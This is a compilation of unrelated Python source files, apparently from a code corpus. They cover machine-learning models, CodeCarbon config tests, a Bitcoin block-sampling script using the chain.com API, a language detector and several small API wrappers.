print_info('avg reward = ', total_reward / (episode_length * render_env.frame_skip))
if not repeat:
break
del viewer
|
117660
|
from typing import Any
from pydantic import BaseModel
from tracardi.domain.enum.yes_no import YesNo
class Settings(BaseModel):
enabled: bool = True
hidden: bool = False
@staticmethod
def as_bool(state: YesNo):
        return state == YesNo.yes
class SystemSettings(BaseModel):
label: str
value: Any
desc: str
|
117696
|
from .vggs import vgg_all
from lc.models.torch.nincif import nincif_bn
__all__ = ["nin_all"]
class nin_all(vgg_all):
def __init__(self):
super(nin_all, self).__init__("nin_all", nincif_bn(), 'nincif_bn')
|
117822
|
import os
import unittest
from textwrap import dedent
from unittest import mock
from unittest.mock import patch
from codecarbon.core.config import (
clean_env_key,
get_hierarchical_config,
parse_env_config,
parse_gpu_ids,
)
from codecarbon.emissions_tracker import EmissionsTracker
from tests.testutils import get_custom_mock_open
class TestConfig(unittest.TestCase):
def test_clean_env_key(self):
for key in [1, None, 0.2, [], set()]:
with self.assertRaises(AssertionError):
clean_env_key(key)
for (key, target) in [
("", ""),
("USER", "user"),
("CODECARBON_TEST", "test"),
("CODECARBON_TEST_VALUE", "test_value"),
("CODECARBON_TEST_1", "test_1"),
("CODECARBON_1", "1"),
]:
self.assertEqual(clean_env_key(key), target)
def test_parse_gpu_ids(self):
for (ids, target) in [
("0,1,2", [0, 1, 2]),
("[0, 1, 2", [0, 1, 2]),
("(0, 1, 2)", [0, 1, 2]),
("[1]", [1]),
("1", [1]),
("0", [0]),
("", []),
(1, 1),
]:
self.assertEqual(parse_gpu_ids(ids), target)
@mock.patch.dict(
os.environ,
{
"USER": "yes",
"CODECARBON_TEST": "test-VALUE",
"CODECARBON_TEST_KEY": "this_other_value",
},
)
def test_parse_env_config(self):
self.assertDictEqual(
parse_env_config(),
{"codecarbon": {"test": "test-VALUE", "test_key": "this_other_value"}},
)
def test_read_confs(self):
global_conf = dedent(
"""\
[codecarbon]
no_overwrite=path/to/somewhere
local_overwrite=ERROR:not overwritten
syntax_test_key= no/space= problem2
"""
)
local_conf = dedent(
"""\
[codecarbon]
local_overwrite=SUCCESS:overwritten
local_new_key=cool value
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {
"no_overwrite": "path/to/somewhere",
"local_overwrite": "SUCCESS:overwritten",
"syntax_test_key": "no/space= problem2",
"local_new_key": "cool value",
}
self.assertDictEqual(conf, target)
@mock.patch.dict(
os.environ,
{
"USER": "useless key",
"CODECARBON_ENV_OVERWRITE": "SUCCESS:overwritten",
"CODECARBON_ENV_NEW_KEY": "cool value",
},
)
def test_read_confs_and_parse_envs(self):
global_conf = dedent(
"""\
[codecarbon]
no_overwrite=path/to/somewhere
local_overwrite=ERROR:not overwritten
syntax_test_key= no/space= problem2
env_overwrite=ERROR:not overwritten
"""
)
local_conf = dedent(
"""\
[codecarbon]
local_overwrite=SUCCESS:overwritten
local_new_key=cool value
env_overwrite=ERROR:not overwritten
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {
"no_overwrite": "path/to/somewhere",
"local_overwrite": "SUCCESS:overwritten",
"env_overwrite": "SUCCESS:overwritten",
"syntax_test_key": "no/space= problem2",
"local_new_key": "cool value",
"env_new_key": "cool value",
}
self.assertDictEqual(conf, target)
def test_empty_conf(self):
global_conf = ""
local_conf = ""
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {}
self.assertDictEqual(conf, target)
@mock.patch.dict(
os.environ,
{
"CODECARBON_SAVE_TO_FILE": "true",
"CODECARBON_GPU_IDS": "0, 1",
"CODECARBON_PROJECT_NAME": "ERROR:not overwritten",
},
)
def test_full_hierarchy(self):
global_conf = dedent(
"""\
[codecarbon]
measure_power_secs=10
output_dir=ERROR:not overwritten
save_to_file=ERROR:not overwritten
"""
)
local_conf = dedent(
"""\
[codecarbon]
output_dir=/success/overwritten
emissions_endpoint=http://testhost:2000
gpu_ids=ERROR:not overwritten
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
tracker = EmissionsTracker(
project_name="test-project", co2_signal_api_token="signal-token"
)
self.assertEqual(tracker._measure_power_secs, 10)
self.assertEqual(tracker._output_dir, "/success/overwritten")
self.assertEqual(tracker._emissions_endpoint, "http://testhost:2000")
self.assertEqual(tracker._gpu_ids, [0, 1])
self.assertEqual(tracker._co2_signal_api_token, "signal-token")
self.assertEqual(tracker._project_name, "test-project")
self.assertTrue(tracker._save_to_file)
|
117834
|
import argparse
import keras.backend as K
from keras.layers import Input, Conv2D, Add
from keras.models import Model
from keras.utils import plot_model
import utils
from config import img_size, channel, kernel
def build_model(scale, num_layers=32, feature_size=256, scaling_factor=0.1):
input_tensor = Input(shape=(img_size, img_size, channel))
# One convolution before res blocks and to convert to required feature depth
x = Conv2D(feature_size, (kernel, kernel), activation='relu', padding='same', name='conv1')(input_tensor)
# Store the output of the first convolution to add later
conv_1 = x
"""
This creates `num_layers` number of resBlocks
a resBlock is defined in the paper as
(excuse the ugly ASCII graph)
x
|\
| \
| conv2d
| relu
| conv2d
| /
|/
+ (addition here)
|
result
"""
"""
Doing scaling here as mentioned in the paper:
`we found that increasing the number of feature
maps above a certain level would make the training procedure
numerically unstable. A similar phenomenon was
reported by Szegedy et al. We resolve this issue by
adopting the residual scaling with factor 0.1. In each
residual block, constant scaling layers are placed after the
last convolution layers. These modules stabilize the training
procedure greatly when using a large number of filters.
In the test phase, this layer can be integrated into the previous
convolution layer for the computational efficiency.'
"""
# Add the residual blocks to the model
for i in range(num_layers):
x = utils.res_block(x, feature_size, scale=scaling_factor)
x = Conv2D(feature_size, (kernel, kernel), padding='same')(x)
x = Add()([x, conv_1])
# Upsample output of the convolution
x = utils.upsample(x, scale, feature_size)
outputs = x
model = Model(inputs=input_tensor, outputs=outputs, name="EDSR")
return model
if __name__ == '__main__':
ap = argparse.ArgumentParser()
ap.add_argument("-s", "--scale", help="scale")
args = vars(ap.parse_args())
scale = int(args["scale"])
m = build_model(scale)
print(m.summary())
plot_model(m, to_file='model.svg', show_layer_names=True, show_shapes=True)
K.clear_session()
|
117842
|
from typing import Optional
import cld3
def detect_language(text: str) -> Optional[str]:
    prediction = cld3.get_language(text)
    if prediction and prediction.is_reliable:
        return prediction.language
    return None
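# Usage sketch:
# detect_language("Bonjour tout le monde")  # -> 'fr' when cld3 is confident
# detect_language("xq z 9")                 # -> None when detection is unreliable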
|
117867
|
import json
import os
import random
import requests
import sys
import time
CHAIN_API_KEY = os.environ.get('CHAIN_API_KEY', None)
CHAIN_API_SECRET = os.environ.get('CHAIN_API_SECRET', None)
def get_from_chain(url_adder):
url = 'https://api.chain.com/v2/bitcoin/%s' % (url_adder)
ok = False
while not ok:
try:
r = requests.get(url, auth=(CHAIN_API_KEY, CHAIN_API_SECRET))
r.raise_for_status()
ok = True
except requests.HTTPError as e:
if r.status_code == 429: # Too many requests
time.sleep(1)
else:
print("Request was to %s" % (url))
raise e
b = json.loads(r.text)
return b
def get_block(block):
''' block can be: a hash, index or "latest" '''
return get_from_chain("blocks/%s" % (block))
def get_txn(tx):
tx_json = _get_txn(tx)
raw_txn = _get_txn(tx_json['hash'], True)
tx_json['hex'] = raw_txn['hex']
return tx_json
def _get_txn(tx, raw=False):
url_adder = "transactions/%s" % (tx)
if raw:
url_adder += '/hex'
return get_from_chain(url_adder)
if __name__ == "__main__":
last_block_index = get_block("latest")['height']
print("last_block_index = %d" % (last_block_index))
num_txns = 2500
full_blocks = 50
block_indices = [random.randrange(0, last_block_index) for i in range(num_txns)]
txns = []
special_txns = ["52759f4ed9bf231014f040c7d0329e783aaa93cf973136d131b0cd55b9bf45cf",
"39409570293e8ec38970b0da814cbb826e75501036ac2f42836859b3ac8120ea",
"a258709e0f21a2cfdf053c3ee08b547dee1574179fbb964b37a43c7cd37c5f74"]
for tx_hash in special_txns:
tx = get_txn(tx_hash)
txns.append(tx)
blocks = []
blocks_grabbed = 0
for bi in block_indices:
b = get_block(bi)
if blocks_grabbed < full_blocks:
blocks.append(b)
# Grab all the txns in this block
for t, txn_hash in enumerate(b['transaction_hashes']):
sys.stdout.write("\rGrabbing txn #%d/%d for block %d (%d/%d) ..." %
(t, len(b['transaction_hashes']), bi, blocks_grabbed + 1, full_blocks))
txns.append(get_txn(txn_hash))
blocks_grabbed += 1
# Dump the file along the way
with open("blocks.json", 'w') as f:
json.dump(blocks, f)
else:
got_tx = False
while not got_tx:
try:
tx_num = random.randrange(0, len(b['transaction_hashes']))
tx = get_txn(b['transaction_hashes'][tx_num])
tx['block_version'] = b['version']
txns.append(tx)
got_tx = True
            except Exception:
pass
print("\rblock = %d (version: %d), used txn %d" % (bi, b['version'], tx_num))
with open("txns.json", 'w') as f:
json.dump(txns, f)
|
117873
|
from jsonobject import (BooleanProperty, DefaultProperty, IntegerProperty,
JsonObject, ListProperty, StringProperty)
class TlsResult(JsonObject):
ips_scanned = IntegerProperty()
protocols = ListProperty(StringProperty())
hsts_present = BooleanProperty()
trusted = BooleanProperty()
scan_results = DefaultProperty()
domain = StringProperty()
|
117874
|
from __future__ import print_function
from urllib.request import Request, urlopen
import urllib
base_uri = 'http://127.0.0.1:8000?text='
def coref(text, no_detail=False):
def get_raw_data_from_web(a_uri):
req = Request(a_uri, headers={'User-Agent': 'PythonBook/1.0'})
http_response = urlopen(req)
data = http_response.read()
return data
encoded_text = urllib.parse.quote(text, safe='')
if no_detail:
z = '&no_detail=1'
else:
z = ''
raw_data = get_raw_data_from_web(base_uri + encoded_text + z)
return raw_data.decode("UTF8")
print(coref('My sister has a dog named Sam. She loves him'))
print(coref('My sister has a dog named Sam. She loves him', no_detail=True))
|
117885
|
import pandas as pd
import torch
from torch.utils.data import Dataset
from typing import Tuple, List, Callable
class Corpus(Dataset):
"""Corpus class"""
def __init__(self, filepath: str, transform_fn: Callable[[str], List[int]]) -> None:
"""Instantiating Corpus class
Args:
filepath (str): filepath
transform_fn (Callable): a function that can act as a transformer
"""
self._corpus = pd.read_csv(filepath, sep='\t')
self._transform = transform_fn
def __len__(self) -> int:
return len(self._corpus)
    def __getitem__(self, idx: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
q1, q2, is_duplicate = self._corpus.iloc[idx].tolist()
list_of_indices, list_of_token_types = [torch.tensor(elm) for elm in self._transform(q1, q2)]
label = torch.tensor(is_duplicate)
return list_of_indices, list_of_token_types, label
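# Minimal usage sketch (hypothetical tokenizer; the real transform_fn is
# supplied by the surrounding project):
# corpus = Corpus('train.tsv', transform_fn=my_tokenizer.encode_pair)
# loader = torch.utils.data.DataLoader(corpus, batch_size=32, shuffle=True)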
|
117889
|
from .base import *
class apps(object):
"""
    cytoscape apps command interface as shown in CyREST's swagger documentation.
:param url: an url of the type 'http://' + host + ':' + str(port) + '/' + version + '/'.
"""
def __init__(self, url):
self.__url = url + 'commands/apps'
self.___url=url
def getAppList(self, verbose=None):
"""
Returns installed Cytoscape Apps that have CyREST accessible Functions or Commands, as a list of App names.
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'apps', method="H", verbose=verbose, parse_params=False)
return response
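# Usage sketch (assumes a running Cytoscape instance exposing CyREST):
# app_list = apps('http://localhost:1234/v1/').getAppList()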
|